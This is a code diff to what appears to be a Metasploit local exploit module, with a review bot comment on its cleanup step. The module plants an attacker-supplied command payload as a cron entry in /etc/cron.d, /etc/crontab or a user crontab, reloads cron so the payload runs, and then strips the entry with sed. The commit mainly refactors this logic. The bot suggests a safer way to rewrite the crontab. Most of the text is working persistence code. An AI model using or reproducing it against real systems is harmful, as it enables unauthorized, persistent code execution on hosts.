fixes round 2

bug/bundler_fix
h00die 2016-07-15 08:44:39 -04:00
parent 35e3fb3e2f
commit 33ce3ec3ed
1 changed files with 18 additions and 19 deletions


@ -3,9 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/file'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
@ -31,15 +28,15 @@ class MetasploitModule < Msf::Exploit::Local
'Platform' => ['unix', 'linux'],
'Targets' =>
[
[ 'Cron', { 'path' => '/etc/cron.d' } ],
[ 'User Crontab', { 'path' => '/var/spool/cron' } ],
[ 'System Crontab', { 'path' => '/etc' } ]
[ 'Cron', { :path => '/etc/cron.d' } ],
[ 'User Crontab', { :path => '/var/spool/cron' } ],
[ 'System Crontab', { :path => '/etc' } ]
],
'DefaultTarget' => 1,
'Arch' => ARCH_CMD,
'Payload' =>
{
'BadChars' => "#%\x10\x13", # % always seems to fail, # is for comments
'BadChars' => "#%\x10\x13", # is for comments, % is for newline
'Compat' =>
{
'PayloadType' => 'cmd',
@ -68,11 +65,11 @@ class MetasploitModule < Msf::Exploit::Local
cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'
cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*
# cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'
unless datastore['TIMING'] =~ %r{#{cron_regex}}
unless datastore['TIMING'] =~ /#{cron_regex}/
fail_with(Failure::BadConfig, 'Invalid timing format')
end
cron_entry = datastore['TIMING']
if target.name =~ /User Crontab/
if target.name.include? 'User Crontab'
unless user_cron_permission?(datastore['USERNAME'])
fail_with(Failure::NoAccess, 'User denied cron via cron.deny')
end
@ -84,32 +81,34 @@ class MetasploitModule < Msf::Exploit::Local
case target.name
when 'Cron'
our_entry = Rex::Text.rand_text_alpha(10)
write_file(target.opts['path'] + "/#{our_entry}", "#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{target.opts['path']}/#{our_entry}")
write_file("#{target.opts[:path]}/#{our_entry}", "#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{target.opts[:path]}/#{our_entry}")
if datastore['CLEANUP']
register_file_for_cleanup("#{target.opts['path']}/#{our_entry}")
register_file_for_cleanup("#{target.opts[:path]}/#{our_entry}")
end
when 'System Crontab'
file_to_clean = "#{target.opts['path']}/crontab"
file_to_clean = "#{target.opts[:path]}/crontab"
append_file(file_to_clean, "\n#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{file_to_clean}")
when 'User Crontab'
file_to_clean = "#{target.opts['path']}/crontabs/#{datastore['USERNAME']}"
file_to_clean = "#{target.opts[:path]}/crontabs/#{datastore['USERNAME']}"
append_file(file_to_clean, "\n#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{file_to_clean}")
# at least on ubuntu, we need to restart cron to get this to work
# at least on ubuntu, we need to reload cron to get this to work
vprint_status('Reloading cron to pickup new entry')
cmd_exec("service cron restart")
cmd_exec("service cron reload")
end
print_status("Waiting #{datastore['WfsDelay']}sec for execution")
sleep(datastore['WfsDelay'].to_i)
Rex.sleep(datastore['WfsDelay'].to_i)
# we may need to do some cleanup, no need for cron since that uses file dropper
# we could run this on a on_successful_session, but we want cleanup even if it fails
if file_to_clean && flag && datastore['CLEANUP']
print_status("Removing our cron entry from #{file_to_clean}")
cmd_exec("perl -pi -e 's/.*#{flag}$//g' #{file_to_clean}")
cmd_exec("sed '/#{flag}$/d' #{file_to_clean} > #{file_to_clean}.new")
cmd_exec("mv #{file_to_clean}.new #{file_to_clean}")
# replaced cmd_exec("perl -pi -e 's/.*#{flag}$//g' #{file_to_clean}") in favor of sed
if target.name == 'User Crontab' # make sure we clean out of memory
cmd_exec("service cron restart")
cmd_exec("service cron reload")
end
end
end
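Review bot: The cleanup branch at the end of the last hunk filters the crontab into `#{file_to_clean}.new` and then `mv`s it over the original, so the host is left with a newly created file whose owner and mode may differ from the crontab it replaced; some cron implementations ignore crontabs with unexpected ownership or permissions, which would silently disable the legitimate entries in that file. Neither `cmd_exec` result is checked, so if `sed` fails the `mv` still installs an empty or partial `.new` file over the existing crontab. Writing back in place keeps the original inode and metadata and only runs when the filter succeeded: `cmd_exec("sed '/#{flag}$/d' #{file_to_clean} > #{file_to_clean}.new && cat #{file_to_clean}.new > #{file_to_clean}")` followed by `cmd_exec("rm -f #{file_to_clean}.new")`. The enclosing method starts outside this hunk and `flag` is defined there, so this assumes it is a plain alphanumeric marker that needs no escaping inside the sed pattern.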